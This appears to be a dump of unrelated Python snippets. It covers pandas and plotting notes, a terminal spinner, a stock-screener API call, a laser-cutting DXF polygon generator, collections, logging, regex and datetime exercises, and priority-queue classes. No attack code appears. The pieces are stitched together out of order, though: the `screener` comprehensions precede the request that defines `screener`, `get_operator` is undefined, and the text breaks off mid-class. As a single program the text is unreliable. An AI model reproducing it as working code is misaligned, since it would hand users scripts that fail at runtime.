# df.iloc[slice/list single intger row position, slice/list or single integer column position] 0-based indexing. When slicing, the start bound is included, while the upper bound is excluded.


# def is_hot_dry(temp, humid):
#     if (temp > 0.8) & (humid < -0.5):
#         return 1
#     else:
#         return 0
# df['hot'] = df.apply(lambda x: is_hot_dry(x['avgTemp'], x['avgHumidity']), axis =  1) put output of function with 2 df columsn as arguments into new column

# group df by 1 column and get a new df for which you specify how the columns are aggregated
# column_list = ['city_id',  'purchases', '_year', '_month', '_day', '_date', 'Transaktionscode', 'MCC',  'umsatz', 'online', 'mobilfunker']
# agg_dict = { 'city_id': 'first',  'purchases': 'sum', '_year': 'first', '_month': 'first', '_day': 'first', '_date': 'first', 'Transaktionscode': 'first', 'MCC': 'first',  'umsatz': 'sum', 'online': 'first', 'mobilfunker': 'first' }
# df = df.groupby('_date')[column_list].agg( agg_dict ).reset_index(drop=True)

#df = df.loc[ df['Merchantname'].str.contains('Shop', case=False) ] loc on part of string ignoring upper and lower case
#df = df.loc[ ~df['Merchantname'].str.contains('Shop', case=False) ] same for excluding these elements



# df_shop = df_join_weekday.loc[ df_join['dealerID_Long'] == 2870000, 'dealerID_Long':'wind' ]
# gb_join_weekday = df_join.groupby('weekday')['purchases'].sum()
# gb_weekday.plot(kind='bar')
# gb_weekday = df.groupby('_month')[['purch_ga_hvv_res','purch_ae_access_bbi','purch_ga_netcube']].sum().plot(kind='bar') more than 1 bar per group
# df_agg.set_index("dealerID_Long", inplace=True)
# print(df_orig.groupby('DealerID_Long').count()) count unique values in dataframe column
# df.purchases.sum(axis=0) sum over 1 column
# df_cat = df_date.loc[ (df_date['Kategorie'] == 'None') | (df_date['Kategorie'].isnull()) ] # select complex boolean statement for loc with | and & not (or, and)

# for ind,row in df_merged.iterrows(): iterating over dataframes rows and in the process adding values to a new column
#     df_merged.loc[ind,'new-column_name'] = counter

# df_shop_station_match = pd.DataFrame(columns=[ 'city_id', '_city_name', 'Dealer_latitude','Dealer_longitude', 'dealer_name', 'DealerID_Long'])
# df_shop_station_match.loc[counter] = [close_city_id, close_city_name, row['Dealer_latitude'],row['Dealer_longitude'], row['dealer_name'], row['DealerID_Long']]
    # using loc to iteratively fill a dataframe

# df_city.loc[ : , new_target_name ] = pd.Series(new_target_data[:,0], index=df_city.index) using loc for filling a df column with a numpy array

# df_east_1.loc[:, 'holiday_week'] = df_east_1['calendar_week'].values - 26 # setting values for new column with another column
# df['kda'] = np.where(df['deaths']>0, (df['kills'] + df['assists']) / df['deaths'], df['kills'] + df['assists']) # set new column values with condition on old column

#df.loc[:, target_variable] = df[target_name_list].sum(axis=1) new column as sum of several other columns


# df_new = df_f.iloc[0:0] erase all data in a dataframe

# df_new = df.iloc[0:0] 
# df_new.loc[:,'A'] = df.loc[:,'A'] copy values for the whole column from df to df new; also copies index from df

#corrMatrix = df_shop.corr() 
#sns.heatmap(corrMatrix,annot=True)
# bottom, top = ax.get_ylim()
# ax.set_ylim(bottom + 0.5, top - 0.5)

# pd.plotting.scatter_matrix(df)
# pd.plotting.autocorrelation_plot(df_f[variable_to_plot])


#corrList = df_join_weekday.corr()['purchases'][1:] only correlation with 1 variable
#corrList.plot(kind='bar')

# dum = df.groupby( ['_year','_weekday'] )['purchases_total'].sum().unstack(level=0) plot heatmap of data grouped by 2 attributes
# sns.heatmap(dum, cmap='viridis',annot=True)
# bottom, top = ax.get_ylim()
# ax.set_ylim(bottom + 0.5, top - 0.5)

# df_city.plot(x='_date', y=target_variable, style='.') point plot with datetime x axis (parse dates in read statement); not possible to use c= column
# style format = marker line color '.-g'

# df.boxplot('in_count_mall', by='_month') # box plot a dataframe


#plotting ------------------------------------------------------------------------------------------------

# fig, axs = plt.subplots(1,3)
# axs[0].scatter(x,y)
# axs[0].set(xlabel='x', ylabel='y')

#scatter plot with trend line:
# xString = 'unixTime'
# yString = 'purchases'
# x=df_join_weekday[xString]
# y=df_join_weekday[yString]
# plt.scatter(x, y)
# plt.xlabel(xString)
# plt.ylabel(yString)
# z = np.polyfit(x, y, 1)
# p = np.poly1d(z)
# plb.plot(x, p(x), 'm-')
# plt.show()

# pd.plotting.scatter_matrix(df_draw, alpha=0.2, figsize=(10, 10),diagonal='kde') # plotting a scatter matrix from a data frame
# plt.show()

# plot all columns of df with labels and stuff
#df_weather.plot('DATE')

# plot all the columns of a groupby object (= without selection of a column after ('_weekday'))
# gb = df.groupby('_weekday').count()

# for i in range(6): plotting several subplots in 1 figure
#     ax = plt.subplot(3, 2, i+1)
#     df.plot.scatter(x=column_list[i],y='purchases_mall',c='_weekday', colormap = 'viridis', ax=ax)

# fig, ax = plt.subplots()
# for name, group in df.groupby('_year'):
#     group.plot(x='day_year', y='purchases_total', ax=ax, label=name) plot values of a column grouped by values of another column into a single plot

# df['N'].hist(by=df['Letter']) hists of column N grouped by the column letter - seperate hist for each letter

# gb = df.groupby(['Kategorie','_month'],as_index='False')[['purchases']].sum()
# gb.unstack(level=0).plot(kind='bar', subplots=True) plot multiindex dataframe from line above as barplot with several subplots

# fig, ax1 = plt.subplots() plot a second column with seperate y axis in same plot
# ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis
# df.plot(x='_date', y= 'in_counts', ax = ax1, color = 'tab:blue')
# df.plot(x='_date', y= 'avgTemp', ax = ax2, color = 'tab:red')
# plt.show()

# df.plot(y = 'in_counts', ax = ax1, color = 'tab:blue', use_index = True) plot column vs index


# params = {'font.size': 10, #adjusting plot properties
#         'legend.fontsize': 'xx-small',
#         'axes.labelsize': 'xx-small',
#         'axes.titlesize':'xx-small',
#         'xtick.labelsize':'xx-small',
#         'ytick.labelsize':'xx-small'}
# plt.rcParams.update(params)
# plt.subplots_adjust(wspace=0.4, hspace=0.4) # width and height space
# plt.savefig( pltString, dpi=300 )

# fit data with self defined function
# from scipy.optimize import curve_fit 
# def func(x, a, b, c):
#     return a / x + b + c * x
# popt, pcov = curve_fit(func, df['shop_sum_scaled'], df['in_buy_ratio'])
# plt.plot(df['shop_sum_scaled'], func(df['shop_sum_scaled'], *popt), 'r.')


# datetime stuff ---------------------------------------------------------

# date_list = df['_date'].unique()  select unique dates and convert to pandas datetime
# date_list = pd.to_datetime(date_list)

# or date_list = date_list.astype('M8[D]')

# import matplotlib.dates as mdates #formatting date axis
# months = mdates.MonthLocator()
# days = mdates.DayLocator(interval = 10)
# months_fmt = mdates.DateFormatter('%Y-%m')
# days_fmt = mdates.DateFormatter('%d')
# ax.xaxis.set_major_locator(months)
# ax.xaxis.set_minor_locator(days)
# ax.xaxis.set_major_formatter(months_fmt)
# ax.xaxis.set_minor_formatter(days_fmt)


# Lists -----------------------------------------------------------------------------------------------

# list_not_mall = [sum(a) for a in zip(list_urban, list_periphery)] elementwise summation of 2 lists
# sort_ind[-10:] last 10 elements of numpy array
# a = [2 if x < 4 else x for x in a ]
# b = [2 for x in a if x < 4]

# new_infections = [y - x for x,y in zip(tot_infections,tot_infections[1:])] # subtract previous element in list


# groupby -----------------------------------------------------------------------------------------------------------

# df.groupby(pd.cut( df["avgTemp"], np.arange(15, 40, 5) ))['purchases_mall'].mean() groupby numerical value (avgTemp)


# dicts -------------------------------------------------------------------

# {key: value for (key, value) in iterable}

# statistics ----------------------------------------------------------------

# r, pval_p = stat.pearsonr(df['in_counts'].values, df['purchases5651'].values)
# print('pearson r:', r, 'pearson pval:', pval_p)

# rho, pval = stat.spearmanr(df['in_counts'].values, df['purchases5651'].values)
# print('spearman rho:', rho, 'spearman pval:', pval )


# strings -------------------------------------------------------------------

# axs[2].set_title('pearson_r: ' + str( np.around(r1,3) ) + ' , p_val: ' +  '{:.1e}'.format(pval_p3) )
df_cliente.groupby([df_cliente['dt_transacao'].dt.date]).mean()
from itertools import cycle
from shutil import get_terminal_size
from threading import Thread
from time import sleep


class Loader:
    def __init__(self, desc="Loading...", end="Done!", timeout=0.1):
        """
        A loader-like context manager

        Args:
            desc (str, optional): The loader's description. Defaults to "Loading...".
            end (str, optional): Final print. Defaults to "Done!".
            timeout (float, optional): Sleep time between prints. Defaults to 0.1.
        """
        self.desc = desc
        self.end = end
        self.timeout = timeout

        # Daemon thread: never blocks interpreter shutdown.
        self._thread = Thread(target=self._animate, daemon=True)
        self.steps = ["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]
        self.done = False

    def start(self):
        """Start the spinner thread; returns self so calls can be chained."""
        self._thread.start()
        return self

    def _animate(self):
        # Redraw the spinner glyph on the same line until stop() flips `done`.
        for c in cycle(self.steps):
            if self.done:
                break
            print(f"\r{self.desc} {c}", flush=True, end="")
            sleep(self.timeout)

    def __enter__(self):
        # was: no return value, so `with Loader(...) as ldr:` bound ldr to None.
        return self.start()

    def stop(self):
        """Stop the spinner, blank its line and print the final message."""
        self.done = True
        cols = get_terminal_size((80, 20)).columns
        print("\r" + " " * cols, end="", flush=True)
        print(f"\r{self.end}", flush=True)

    def __exit__(self, exc_type, exc_value, tb):
        # handle exceptions with those variables ^
        self.stop()


if __name__ == "__main__":
    # Demo 1: context-manager usage (spinner stops when the block exits).
    with Loader("Loading with context manager..."):
        for _ in range(10):
            sleep(0.25)

    # Demo 2: explicit start()/stop() usage.
    spinner = Loader("Loading with object...", "That was fast!", 0.05).start()
    for _ in range(10):
        sleep(0.25)
    spinner.stop()
# Report the mobile network operator, or "No Signal" when unregistered.
op = get_operator()
try:
  # was: Python-2 `print` statements — a SyntaxError on Python 3.
  if "Not Registered" in op:
     print("No Signal")
  else:
     print("Operator Name: " + op)
except Exception:
  # was a bare `except:`, which would also swallow KeyboardInterrupt/SystemExit
  print("Error occored")
# Pull one field of interest out of every screener row.
# was: four near-identical append loops — a comprehension states each
# extraction in a single line.

#extract list of tickers from screener
tickers = [item['symbol'] for item in screener]

#extract list of sectors from screener
sectors = [item['sector'] for item in screener]

#extract list of industries from screener
industries = [item['industry'] for item in screener]

#extract list of companies from screener
name = [item['companyName'] for item in screener]
#url to retrieve company tickers
# FinancialModelingPrep stock screener: large caps (>$10B) with volume > 10k.
# NOTE(review): `api` (the key) and the `requests` import must come from the
# surrounding script.
url = (f'https://financialmodelingprep.com/api/v3/stock-screener?marketCapMoreThan=10000000000&volumeMoreThan=10000&apikey={api}')

#call api and convert to json
screener = requests.get(url).json()
import pandas as pd
import numpy as np
from openpyxl import load_workbook

path = r"C:\Users\fedel\Desktop\excelData\PhD_data.xlsx"

# Attach the existing workbook to the writer so new sheets are appended rather
# than the file being overwritten.
# NOTE(review): assigning `writer.book` only works on older pandas versions;
# modern pandas uses pd.ExcelWriter(path, engine='openpyxl', mode='a') —
# confirm the pandas version in use.
book = load_workbook(path)
writer = pd.ExcelWriter(path, engine = 'openpyxl')
writer.book = book

# Two 100x2 frames of standard-normal samples, one sheet each.
x3 = np.random.randn(100, 2)
df3 = pd.DataFrame(x3)

x4 = np.random.randn(100, 2)
df4 = pd.DataFrame(x4)

df3.to_excel(writer, sheet_name = 'x3')
df4.to_excel(writer, sheet_name = 'x4')
writer.save()
writer.close()
import numpy as np
import pandas as pd
import perfplot

# Benchmark three ways of counting DataFrame rows over sizes 2^0..2^24 and
# save the timing plot to out.png (perfplot is a third-party benchmark helper).
perfplot.save(
    "out.png",
    setup=lambda n: pd.DataFrame(np.arange(n * 3).reshape(n, 3)),
    n_range=[2**k for k in range(25)],
    kernels=[
        lambda df: len(df.index),
        lambda df: df.shape[0],
        lambda df: df[df.columns[0]].count(),  # NB: count() skips NaNs, so it is not always == len
    ],
    labels=["len(df.index)", "df.shape[0]", "df[df.columns[0]].count()"],
    xlabel="Number of rows",
)
# Mount Google Drive into the Colab VM filesystem (prompts for authorisation).
from google.colab import drive
drive.mount('/content/drive')
a, b = 1, 0

try:
    # b is 0, so the division raises ZeroDivisionError here.
    print(a / b)
except ZeroDivisionError:
    print("division by zero")
else:
    # Runs only when the try body raised nothing.
    print("no exceptions raised")
finally:
    # Cleanup path: runs whether or not an exception occurred.
    print("Run this always")
# view raw  (stray text pasted from the snippet host's UI — not code)
from collections import Counter

str_1, str_2, str_3 = "acbde", "abced", "abcda"
# Two strings are anagrams iff their character-frequency tables are equal.
cnt_1, cnt_2, cnt_3 = (Counter(word) for word in (str_1, str_2, str_3))

if cnt_1 == cnt_2:
    print('1 and 2 anagram')
if cnt_1 == cnt_3:
    print('1 and 3 anagram')
# finding frequency of each element in a list
from collections import Counter

my_list = ['a','a','b','b','b','c','d','d','d','d','d']
count = Counter(my_list)  # multiset: element -> number of occurrences

print(count)  # every element with its count
# Counter({'d': 5, 'b': 3, 'a': 2, 'c': 1})

print(count['b'])  # a single element's count (missing keys would give 0)
# 3

print(count.most_common(1))  # the single highest-frequency element
# [('d', 5)]
my_string = "abcba"

# A palindrome reads the same forwards and backwards.
is_palindrome = my_string == "".join(reversed(my_string))
print("palindrome" if is_palindrome else "not palindrome")

# Output
# palindrome
list_of_strings = ['My', 'name', 'is', 'Chaitanya', 'Baweja']

# str.join glues the items together with the separator it is called on.
comma_separated = ','.join(list_of_strings)
print(comma_separated)

# Output
# My,name,is,Chaitanya,Baweja
string_1 = "My name is Chaitanya Baweja"
string_2 = "sample/ string 2"

# With no argument, split() breaks on runs of whitespace.
words = string_1.split()
print(words)
# ['My', 'name', 'is', 'Chaitanya', 'Baweja']

# An explicit separator splits on exactly that string.
print(string_2.split('/'))
# ['sample', ' string 2']
# Multiplying each element in a list by 2

original_list = [1,2,3,4]

# map() applies the doubling to every element; list() materialises the result.
new_list = list(map(lambda value: value * 2, original_list))

print(new_list)
# [2,4,6,8]
n = 3 # number of repetitions

my_string = "abcd"
my_list = [1,2,3]

# sequence * int tiles the sequence n times — works for strings and lists alike.
print(my_string * n)
# abcdabcdabcd

print(my_list * n)
# [1,2,3,1,2,3,1,2,3]
'''
Author: Antonio de Jesús Anaya Hernández
Github: @kny5
Program: Parametric polygon shape generator for laser cutting with kerf and dxf output.

'''
import math
import ezdxf
import random

# Parameters
sides = random.randrange(3, 10, 1)  # random polygon with 3..9 sides
radius = 40  # circumradius of the polygon, in drawing units
origin = (100,100)  # centre point of the polygon
slot_depth = radius/2  # how far the joint slot cuts toward the centre
kerf = 0.2  # laser kerf compensation added to cut dimensions
material_thickness = 5  # sheet thickness; presumably sets the slot width — TODO confirm

class dxf_file():
    """Thin wrapper around an ezdxf document bound to one output filename."""

    def __init__(self, __filename):
        self.filename = __filename
        self.file = None
        self.create_dxf()

    def create_dxf(self):
        # Start a new empty drawing (DXF version R2018) and write it to disk.
        self.file = ezdxf.new('R2018')
        self.file.saveas(self.filename)

    def save_dxf(self):
        self.file.saveas(self.filename)

    def add_vectors_dxf(self, vectors):
        """Add each (start, end) point pair as a LINE entity, then save."""
        self.model = self.file.modelspace()
        for vector in vectors:
            self.model.add_line(vector[0], vector[1])
        # was: save_dxf() inside the loop — rewrote the whole file once per
        # line; a single save after the loop produces the identical file.
        self.save_dxf()


def rotate_point(point, pivot, angle):
    """Rotate *point* by *angle* radians (counter-clockwise) about *pivot*."""
    # Translate so the pivot is the origin, apply the standard 2-D rotation
    # matrix, then translate back.
    dx = point[0] - pivot[0]
    dy = point[1] - pivot[1]
    cos_a = math.cos(angle)
    sin_a = math.sin(angle)
    return (dx * cos_a - dy * sin_a + pivot[0],
            dx * sin_a + dy * cos_a + pivot[1])


def line_intersection(line1, line2):
    """Intersection point of two infinite lines, each given as two points.

    Raises Exception when the lines are parallel (zero determinant).
    """
    def det(a, b):
        # 2-D determinant / cross product of the vectors a and b.
        return a[0] * b[1] - a[1] * b[0]

    xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])
    ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])

    denom = det(xdiff, ydiff)
    if denom == 0:
        raise Exception('lines do not intersect')

    d = (det(*line1), det(*line2))
    return (det(d, xdiff) / denom, det(d, ydiff) / denom)


class workspace():
    """A rectangular layout area that collects placed objects in order."""

    def __init__(self, __origin=(0,0), __width=1000, __height=1000):
        self.origin = __origin
        self.width = __width
        self.height = __height
        self.objects = []  # insertion order is preserved

    def add_object(self, __object):
        """Append one object to the workspace (no sorting is performed —
        the original left an open question about whether it should be)."""
        self.objects.append(__object)


class polygon():
    """Regular polygon with kerf compensation and per-face slot cut-outs.

    Vertices are generated around ``__origin`` with ``__radius`` grown by
    the kerf (laser beam width) so the cut part comes out at nominal size.
    ``slot()`` produces ``self.output``: a list of (start, end) point
    pairs suitable for dxf_file.add_vectors_dxf().
    """

    def __init__(self, __origin, __sides, __radius, __kerf=kerf):
        self.kerf = __kerf
        self.sides = __sides
        # kerf parameter: outer cut is offset by the beam width
        self.radius = __radius + self.kerf
        self.origin = __origin
        self.points = []   # polygon vertices, in angular order
        self.vectors = []  # closed loop of consecutive vertex pairs
        self.angle = 360/self.sides
        self.make()
        self.get_vectors()

    def make(self):
        # Place one vertex per side on the circumscribed circle.
        for side in range(0, self.sides):
            __x = self.origin[0] + self.radius * math.cos(2 * math.pi * side / self.sides)
            __y = self.origin[1] + self.radius * math.sin(2 * math.pi * side / self.sides)
            self.points.append((__x, __y))

    def get_vectors(self):
        # Pair each vertex with the next one, wrapping around to close the loop.
        self.vectors = list(zip(self.points, self.points[1:] + self.points[:1]))

    def slot(self, __width, __depth):
        """Cut a rectangular slot into every face; result in self.output.

        *__width* is typically the material thickness, *__depth* how far
        the slot reaches toward the centre.  Kerf is SUBTRACTED here so
        the mating part fits snugly.
        """
        # kerf parameter: interior cut shrinks by the beam width
        width = __width - self.kerf
        depth = __depth - self.kerf
        # Define points of slot shape (axis-aligned, centred on +x face):
        __a = (self.origin[0] + self.radius - depth, self.origin[1] - (width / 2))
        __b = (self.origin[0] + self.radius - depth, self.origin[1] + (width / 2))
        __c = (self.origin[0] + self.radius, self.origin[1] + (width / 2))
        __d = (self.origin[0] + self.radius, self.origin[1] - (width / 2))

        # Rotate the slot onto the middle of the first face (half the
        # central angle puts it between the first two vertices).
        __a = rotate_point(__a, self.origin, math.radians(self.angle / 2))
        __b = rotate_point(__b, self.origin, math.radians(self.angle / 2))
        __c = rotate_point(__c, self.origin, math.radians(self.angle / 2))
        __d = rotate_point(__d, self.origin, math.radians(self.angle / 2))

        # packing slot sides
        slot_left_side_1 = (__b, __c)
        slot_right_side_1 = (__a, __d)

        # finding intersection point between slot sides and polygon face 1
        right_inter = line_intersection(self.vectors[0], slot_right_side_1)
        left_inter = line_intersection(self.vectors[0], slot_left_side_1)

        # Manually ordering the points of the slot shape
        output = [self.points[0]]
        output.append(right_inter)
        # NOTE(review): __a and __b are each appended twice — presumably to
        # create zero-length separators between slot walls when pairing
        # points below; TODO confirm this is intentional.
        output.append(__a)
        output.append(__a)
        output.append(__b)
        output.append(__b)
        output.append(left_inter)
        # index 7: seven points emitted per face

        # repeating the process radially for the number of faces.
        for side in range(1, self.sides):
            output.append(rotate_point(self.points[0], self.origin, math.radians(side * self.angle)))
            output.append(rotate_point(right_inter, self.origin, math.radians(side * self.angle)))
            output.append(rotate_point(__a, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__a, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__b, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(__b, self.origin, math.radians(side *self.angle)))
            output.append(rotate_point(left_inter, self.origin, math.radians(side * self.angle)))

        # creating a vector list from the points list (closed loop)
        self.output = list(zip(output, output[1:] + output[:1]))


# program test

# creating a random generated polygon
a = polygon(origin, sides, radius)
a.slot(material_thickness, slot_depth)

# creating a DXF document and adding slot output vectors
dxf_file_ = dxf_file("test.dxf")
a.get_vectors()
dxf_file_.add_vectors_dxf(a.output)
def permutationCipher(password, key):
    """Substitute each lowercase letter of *password* via the 26-letter *key*."""
    mapping = str.maketrans('abcdefghijklmnopqrstuvwxyz', key)
    return password.translate(mapping)
def isWordPalindrome(word):
    """Return True if *word* reads the same forwards and backwards.

    Fix: removed the leftover debug statement ``print(word[-1:0])`` —
    that slice is always empty, so it only printed a blank line on every
    call.
    """
    return word == word[::-1]
def func(x):
    """Return "something" for 0, otherwise "something else"."""
    if x == 0:
        return "something"
    return "something else"
def get_batch(vectorized_songs, seq_length, batch_size):
    """Sample (input, target) training batches from a 1-D encoded song array.

    Targets are the inputs shifted one symbol to the right, as usual for
    next-symbol prediction.
    """
    # Highest usable start index: each example needs seq_length + 1 symbols.
    limit = vectorized_songs.shape[0] - 1
    # One random start offset per example in the batch.
    starts = np.random.choice(limit - seq_length, batch_size)

    x_batch = np.stack([vectorized_songs[s:s + seq_length] for s in starts])
    y_batch = np.stack([vectorized_songs[s + 1:s + seq_length + 1] for s in starts])
    return x_batch, y_batch
import sqlite3


class DatabaseConnection:
    """Context manager around a sqlite3 connection to *host*.

    On a clean exit the transaction is committed; if the block raised,
    the connection is closed without committing and the exception
    propagates (``__exit__`` returns None).
    """

    def __init__(self, host):
        self.host = host
        self.connection = None

    def __enter__(self):
        self.connection = sqlite3.connect(self.host)
        return self.connection

    def __exit__(self, exc_type, exc_val, exc_tb):
        if not (exc_type or exc_val or exc_tb):
            # No exception: persist the work before closing.
            self.connection.commit()
        self.connection.close()
from collections import defaultdict, OrderedDict, namedtuple, deque


def task1() -> defaultdict:
    """Build a defaultdict whose missing keys map to the string 'Unknown'.

    One entry is pre-populated: 'Alan' -> 'Manchester'.
    """
    result = defaultdict(lambda: 'Unknown')
    result['Alan'] = 'Manchester'
    return result




def task2(arg_od: OrderedDict):
    """Reshape *arg_od* in place.

    Drops the last and the first entry, then moves 'Bob' to the end and
    'Dan' to the front.  Assumes 'Bob' and 'Dan' are present and are not
    the first or last entry initially.
    """
    arg_od.popitem(last=True)    # drop the final entry
    arg_od.popitem(last=False)   # drop the first entry
    arg_od.move_to_end('Bob', last=True)
    arg_od.move_to_end('Dan', last=False)






def task3(name: str, club: str) -> namedtuple:
    """Return a Player namedtuple (fields: name, club) built from the args."""
    Player = namedtuple('Player', 'name club')
    return Player(name=name, club=club)




def task4(arg_deque: deque):
    """Mutate *arg_deque* in place.

    Drops the last item, rotates the first item to the back, then pushes
    the string 'Zack' onto the front.
    """
    arg_deque.pop()
    head = arg_deque.popleft()
    arg_deque.append(head)
    arg_deque.appendleft('Zack')
class Car:
  """A simple make/model record."""

  def __init__(self, make, model):
    self.make = make
    self.model = model

  def __repr__(self):
    # e.g. <car Ford Fiesta>
    return f'<car {self.make} {self.model}>'


class Garage:
  """Container that accepts only Car instances."""

  def __init__(self):
    self.cars = []

  def __len__(self):
    return len(self.cars)

  def add_car(self, car):
    """Append *car*; raise TypeError for anything that is not a Car.

    Fix: the original f-string was missing the braces around the
    placeholder, so the error message printed the literal text
    ``car.__class__.__name__`` instead of the offending class's name.
    """
    if not isinstance(car, Car):
      raise TypeError(f'Tried to add `{car.__class__.__name__}` to the garage but you can only add car object')
    self.cars.append(car)



ford =Garage()
car = Car('Ford','Fiesta')

ford.add_car(car)
print(len(ford))
# ANY - if any element evaluate to true
# ALL - if all elements evaluete to true

friends = [
    {'name': 'Rolf', 'Location': 'Warszawa'},
    {'name': 'Piotr', 'Location': 'Warszawa'},
    {'name': 'Marek', 'Location': 'Warszawa'},
    {'name': 'Tomasz', 'Location': 'Kraków'},
    {'name': 'Zenek', 'Location': 'Warszawa'},
    {'name': 'Stanislaw', 'Location': 'Warszawa'}

]

yourlocation = input('Where are u?')

friends_nearby = [friend for friend in friends if friend['Location'] == yourlocation ]

if any(friends_nearby): # if there is at least one and False if empty
    print("u are not alone")

if all(friends_nearby):
    print("u are not alone")


#Values that evaluate to false

"""
0 , 0.0 ...
none
[] () {}
False
"""

#print(bool(0))


print(all([1, 2, 3, 4, 5]))
print(all([0, 1, 2, 3, 4, 5]))
def transform_text(text: str) -> str:
    """Alternate character case: even positions lowercase, odd uppercase."""
    pieces = []
    for position, character in enumerate(text):
        if position % 2:
            pieces.append(character.upper())
        else:
            pieces.append(character.lower())
    return "".join(pieces)


def display_vertical_text(text: str):
    """Print *text* vertically, one character per line (nothing for '')."""
    if text:
        print("\n".join(text))




if __name__ == "__main__":
    _text = "Hellow World"
    out = transform_text(text=_text)
    display_vertical_text(out)
#functions that accepts other functions as parameter

def greet():
    """Print a fixed greeting (demo target for before_and_after)."""
    print('Hello')

def before_and_after(func):
    """Call *func* with 'Before' and 'After' printed around it.

    Demonstrates a higher-order function: *func* is any zero-argument
    callable; its return value is ignored.
    """
    print('Before')
    func()
    print('After')

#before_and_after(greet)


#before_and_after(lambda: 5)


books = [
    {'name': 'Matrix', 'Director': 'Wahowski'},
{'name': 'Matrix2', 'Director': 'Wahowski'},
{'name': 'Ogniem I mieczem', 'Director': 'WAJDA'},
{'name': 'Chlopi', 'Director': 'Rejmond'},
{'name': 'QV', 'Director': 'Sienkiewicz'},
{'name': 'LORD', 'Director': 'Tolkien'}

]

def find_book(expected, finder, source=None):
    """Return every book for which ``finder(book) == expected``.

    Parameters:
        expected: value the finder result is compared against.
        finder: callable mapping a book dict to a comparable value.
        source: iterable of book dicts; defaults to the module-level
            ``books`` list, preserving the original behaviour.

    Fix: the original accumulated results in a local named ``list``,
    shadowing the builtin.
    """
    if source is None:
        source = books
    return [book for book in source if finder(book) == expected]





find_by = input('What property are u searching by?')
looking_for = input('What are u looking for?')

book = find_book(looking_for ,lambda book: book[find_by])

print(book or 'No mowies found')
import logging

# Configure the root logger: timestamped records, written to log.txt.
# level=DEBUG means EVERY level from DEBUG upward is emitted.
logging.basicConfig(
    format='%(asctime)s %(levelname) -8s [%(filename)s:%(lineno)d]  %(message)s',
    level=logging.DEBUG,
    datefmt= '%Y-%m-%d %H:%M:%S',
    filename= 'log.txt'
)

# %(...)s - format the record field as a string; ' -8s' left-pads the level name

logger = logging.getLogger('test_log')

# NOTE(review): because the level above is DEBUG, this info record IS
# written to log.txt — the message text is misleading (it would only be
# suppressed at the default WARNING level).
logger.info('This will not show up')
logger.warning('This will')
logger.error('this is error')
logger.critical('Critical error')


"""
DEBUG
INFO

#those show up by default
WARNING
ERROR
CRITICAL

"""
"""
Our definition of a secure filename is:
- The filename must start with an English letters or a number (a-zA-Z0-9).
- The filename can **only** contain English letters, numbers and symbols among these four: `-_()`.
- The filename must end with a proper file extension among `.jpg`, `.jpeg`, `.png` and `.gif`
"""


def is_filename_safe(filename):
    """Return True when *filename* matches the secure-filename policy.

    Policy: starts with a letter or digit; middle characters limited to
    letters, digits and ``-_()``; must end with .jpg/.jpeg/.png/.gif.

    Fix: the pattern is now a raw string so ``\\.`` reaches the regex
    engine as intended instead of relying on Python passing unknown
    string escapes through (a DeprecationWarning today, an error in
    future versions).
    """
    regex = r'^[a-zA-Z0-9][a-zA-Z0-9_()-]*(\.jpg|\.jpeg|\.png|\.gif)$'

    return re.match(regex, filename) is not None


import re

email = 'bartoszjakubiak23@gmail.com'
expresion = '[a-z\.]+'


domain = re.findall(expresion ,email)

print(domain)



price = 'Price : $189.45454'
expresion = 'Price : \$([0-9]*\.[0-9]*)' # \ escape character , * any number of numbers


matches = re.search(expresion ,price)

print(matches.group(0)) # entire match
print(matches.group(1)) # first thing in brackets
"""
. - matches one character
* many characters
[abc] - range of characters
[abc]+ matches one or more of this set
[A-z]+ - upercase
[A-z\.]@[A-z\.]+  - email
[A-z\.]@[A-z]+\.(com|me) - email


"""

from datetime import datetime ,timezone,timedelta


print(datetime.now()) # not aware about time zones , local computer time

print(datetime.now(timezone.utc)) # UTC TIME  +00:00 meaning there is not offset


today =  datetime.now(timezone.utc)
tomorrow = today + timedelta(days=1)

print(tomorrow)

print(today.strftime('%d-%m-%Y %H:%M:%S'))

#user_date = input('Give time in YYYY-mm-dd format')
#user_date = datetime.strptime(user_date,'%Y-%m-%d')

#print(user_date)

print(today.timestamp()) # linux timestamp
import time,timeit


def power(limit):
    """Return the squares of 0..limit-1 as a list."""
    return [value * value for value in range(limit)]




def measure_runtime(func):
    start = time.time()
    func()
    end = time.time()
    print(end - start) # number of seconds since 1970



measure_runtime(lambda :power(5000000)) # lamda function allows us to pass an argument


## another way


print(timeit.timeit('[x**2 for x in range(10)]')) # it runs it many times many times
print(timeit.timeit('list(map(lambda x: x**2,range(10)))'))
# Python code to implement Priority Queue using Linked List
# Node class
class Node:
    """Singly-linked node holding an item and its priority."""
    def __init__(self, item, priority):
        self.item = item
        self.next = None
        self.priority = priority

class PriorityQueue:
    """Max-priority queue backed by a linked list kept in descending
    priority order; equal priorities are served in FIFO order."""

    def __init__(self):
        self.front = self.rear = None

    # Returns a boolean value indicating whether the queue is empty
    def isEmpty(self):
        return self.front is None

    def enqueue(self, item, priority):
        """Insert *item* so the list stays sorted by descending priority.

        Bug fix: the original walked the list with a strict ``<``, so a
        new item whose priority EQUALED the front's fell through with
        ``previous`` still None and crashed with AttributeError; it also
        inserted equal-priority items ahead of existing ones, violating
        the FIFO promise documented on dequeue().  Walking with ``<=``
        fixes both: equal-priority items land after their peers.
        """
        newNode = Node(item, priority)
        if not self.rear:
            # Empty queue: the new node is both front and rear.
            self.front = self.rear = newNode
            return
        if self.front.priority < newNode.priority:
            # Strictly higher priority than everything queued: new front.
            newNode.next = self.front
            self.front = newNode
            return
        previous = None
        current = self.front
        while current and newNode.priority <= current.priority:
            previous = current
            current = current.next

        if current:
            # Insert between previous and current.
            previous.next = newNode
            newNode.next = current
        else:
            # Ran off the end: append and update rear.
            self.rear.next = newNode
            self.rear = newNode

    def dequeue(self):
        """Remove and return the highest-priority item (FIFO on ties).

        Prints a notice and returns None when the queue is empty.
        """
        if self.isEmpty():
            print('Queue is empty')
            return
        temp = self.front
        self.front = self.front.next
        if self.front is None:
            self.rear = None
        return temp.item
# A simple implementation of Priority Queue
# using Queue.
class PriorityQueue(object):
    """Unordered-list priority queue: insert is O(1); delete() scans for
    and removes the largest element (O(n))."""

    def __init__(self):
        self.queue = []

    def __str__(self):
